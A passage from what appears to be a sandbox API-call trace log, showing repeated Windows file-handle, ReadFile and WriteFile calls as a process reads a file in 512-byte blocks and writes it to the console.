out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.564] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.564] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.565] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.565] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.566] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.566] GetFileType (hFile=0x50) returned 0x1 [0134.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.566] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.566] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.566] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.566] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.566] GetFileType (hFile=0x50) returned 0x1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.571] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, 